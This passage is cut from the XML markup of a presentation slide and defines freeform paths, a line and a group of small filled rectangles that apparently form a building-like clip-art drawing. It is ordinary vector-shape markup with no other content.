                    <a:lnTo>
                      <a:pt x="138" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="670"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="673"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="680"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="685"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="319" y="689"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="692"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="696"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="701"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="439" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="711"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="576" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="695" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="708" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="732" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="742" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="753" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="763" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="773" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="791" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="801" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="816" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="824" y="718"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="839" y="717"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="852" y="715"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="865" y="713"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="876" y="712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="710"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="900" y="707"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="910" y="705"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="931" y="700"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="943" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="953" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="965" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="977" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="990" y="683"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1002" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1015" y="676"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1056" y="665"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1070" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1083" y="657"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1096" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1109" y="647"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1120" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1132" y="635"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1142" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1152" y="620"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1160" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="606"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1168" y="601"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1174" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1180" y="579"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1184" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="380"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="361"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="343"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="321"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="297"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1198" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1197" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1196" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1195" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1194" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1191" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1190" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1188" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1186" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1183" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1180" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1176" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1173" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1169" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1165" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1160" y="13"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00FFFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10805" name="Line 212"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2828" y="2754"/>
                <a:ext cx="165" cy="2"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="11113">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10806" name="Group 213"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2958" y="2416"/>
                <a:ext cx="278" cy="690"/>
                <a:chOff x="2550" y="2912"/>
                <a:chExt cx="278" cy="690"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10808" name="Freeform 214"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2578" y="2963"/>
                  <a:ext cx="138" cy="638"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 138"/>
                    <a:gd name="T1" fmla="*/ 485 h 638"/>
                    <a:gd name="T2" fmla="*/ 138 w 138"/>
                    <a:gd name="T3" fmla="*/ 638 h 638"/>
                    <a:gd name="T4" fmla="*/ 138 w 138"/>
                    <a:gd name="T5" fmla="*/ 77 h 638"/>
                    <a:gd name="T6" fmla="*/ 116 w 138"/>
                    <a:gd name="T7" fmla="*/ 49 h 638"/>
                    <a:gd name="T8" fmla="*/ 0 w 138"/>
                    <a:gd name="T9" fmla="*/ 0 h 638"/>
                    <a:gd name="T10" fmla="*/ 0 w 138"/>
                    <a:gd name="T11" fmla="*/ 485 h 638"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T16" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T17" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T18" fmla="*/ 0 w 138"/>
                    <a:gd name="T19" fmla="*/ 0 h 638"/>
                    <a:gd name="T20" fmla="*/ 138 w 138"/>
                    <a:gd name="T21" fmla="*/ 638 h 638"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T12">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T15">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T16">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                    <a:cxn ang="T17">
                      <a:pos x="T10" y="T11"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T18" t="T19" r="T20" b="T21"/>
                  <a:pathLst>
                    <a:path w="138" h="638">
                      <a:moveTo>
                        <a:pt x="0" y="485"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="138" y="638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="138" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="49"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="485"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="606060"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10809" name="Rectangle 215"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2716" y="3035"/>
                  <a:ext cx="84" cy="567"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="E0E0E0"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" altLang="en-US">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10810" name="Freeform 216"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2713" y="3035"/>
                  <a:ext cx="86" cy="64"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 86"/>
                    <a:gd name="T1" fmla="*/ 0 h 64"/>
                    <a:gd name="T2" fmla="*/ 86 w 86"/>
                    <a:gd name="T3" fmla="*/ 0 h 64"/>
                    <a:gd name="T4" fmla="*/ 86 w 86"/>
                    <a:gd name="T5" fmla="*/ 64 h 64"/>
                    <a:gd name="T6" fmla="*/ 0 w 86"/>
                    <a:gd name="T7" fmla="*/ 30 h 64"/>
                    <a:gd name="T8" fmla="*/ 0 w 86"/>
                    <a:gd name="T9" fmla="*/ 0 h 64"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 86"/>
                    <a:gd name="T16" fmla="*/ 0 h 64"/>
                    <a:gd name="T17" fmla="*/ 86 w 86"/>
                    <a:gd name="T18" fmla="*/ 64 h 64"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="86" h="64">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="86" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="86" y="64"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="30"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10811" name="Rectangle 217"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2716" y="3118"/>
                  <a:ext cx="41"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12" name="Rectangle 218"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3117"/>
                  <a:ext cx="43" cy="34"/>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13" name="Rectangle 219"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2737" y="3080"/>
                  <a:ext cx="43" cy="32"/>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814" name="Rectangle 220"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2781" y="3080"/>
                  <a:ext cx="21"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15" name="Rectangle 221"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2712" y="3080"/>
                  <a:ext cx="22"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16" name="Rectangle 222"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3041"/>
                  <a:ext cx="43" cy="34"/>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17" name="Rectangle 223"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2760" y="3042"/>
                  <a:ext cx="43"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18" name="Rectangle 224"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3193"/>
                  <a:ext cx="40"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19" name="Rectangle 225"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3193"/>
                  <a:ext cx="42"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20" name="Rectangle 226"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2780" y="3155"/>
                  <a:ext cx="22"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21" name="Rectangle 227"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2716" y="3155"/>
                  <a:ext cx="17"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22" name="Rectangle 228"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3266"/>
                  <a:ext cx="40"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23" name="Rectangle 229"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3266"/>
                  <a:ext cx="42"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24" name="Rectangle 230"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2737" y="3229"/>
                  <a:ext cx="42"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25" name="Rectangle 231"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2780" y="3229"/>
                  <a:ext cx="22" cy="32"/>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826" name="Rectangle 232"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3229"/>
                  <a:ext cx="18"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27" name="Rectangle 233"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3342"/>
                  <a:ext cx="40"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28" name="Rectangle 234"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3342"/>
                  <a:ext cx="42"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29" name="Rectangle 235"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2736" y="3304"/>
                  <a:ext cx="43" cy="33"/>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830" name="Rectangle 236"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2780" y="3304"/>
                  <a:ext cx="21"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31" name="Rectangle 237"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2716" y="3304"/>
                  <a:ext cx="17"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32" name="Rectangle 238"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3417"/>
                  <a:ext cx="42"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33" name="Rectangle 239"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3416"/>
                  <a:ext cx="43" cy="34"/>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34" name="Rectangle 240"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2737" y="3379"/>
                  <a:ext cx="43"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35" name="Rectangle 241"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2781" y="3379"/>
                  <a:ext cx="21"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36" name="Rectangle 242"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3492"/>
                  <a:ext cx="40" cy="33"/>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837" name="Rectangle 243"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3492"/>
                  <a:ext cx="42"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38" name="Rectangle 244"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2737" y="3455"/>
                  <a:ext cx="42" cy="31"/>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839" name="Rectangle 245"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2780" y="3453"/>
                  <a:ext cx="22"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40" name="Rectangle 246"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2716" y="3453"/>
                  <a:ext cx="17"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41" name="Rectangle 247"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3566"/>
                  <a:ext cx="40"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42" name="Rectangle 248"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2759" y="3566"/>
                  <a:ext cx="42" cy="32"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="400000"/>
                </a:solidFill>
                <a:ln w="9525">
                  <a:noFill/>
                  <a:miter lim="800000"/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" altLang="en-US">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="10843" name="Rectangle 249"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2737" y="3528"/>
                  <a:ext cx="42" cy="32"/>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844" name="Rectangle 250"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2780" y="3528"/>
                  <a:ext cx="22"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45" name="Rectangle 251"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2715" y="3528"/>
                  <a:ext cx="18"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46" name="Freeform 252"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2704" y="3555"/>
                  <a:ext cx="12" cy="41"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 12"/>
                    <a:gd name="T1" fmla="*/ 11 h 41"/>
                    <a:gd name="T2" fmla="*/ 12 w 12"/>
                    <a:gd name="T3" fmla="*/ 41 h 41"/>
                    <a:gd name="T4" fmla="*/ 0 w 12"/>
